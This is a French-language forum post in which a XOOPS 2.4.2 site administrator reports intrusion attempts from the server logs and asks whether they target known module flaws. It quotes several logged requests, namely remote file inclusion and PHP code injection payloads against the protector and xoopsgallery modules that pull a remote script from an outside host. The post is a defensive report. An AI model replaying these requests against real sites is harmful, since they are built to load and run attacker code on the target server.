Bonjour,
je trouve beaucoup de tentative d'intrusion dans xoops depuis 2 hours :
/modules/profile/register.php//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1
et
//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1
et
/register.php//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1
et
/modules//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1
et
/modules/profile//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1
ces requetes ne menent à rien vu le paramétrage du serveur d'hebergement.
Est ce que cela releve des failles connues de ces modules ? sont elles corrigées ?
j'utilise le dernier package xoops 2.4.2
Merci
Éditée par Ghia: Ne publier pas des liens au sites piratée ou SPAM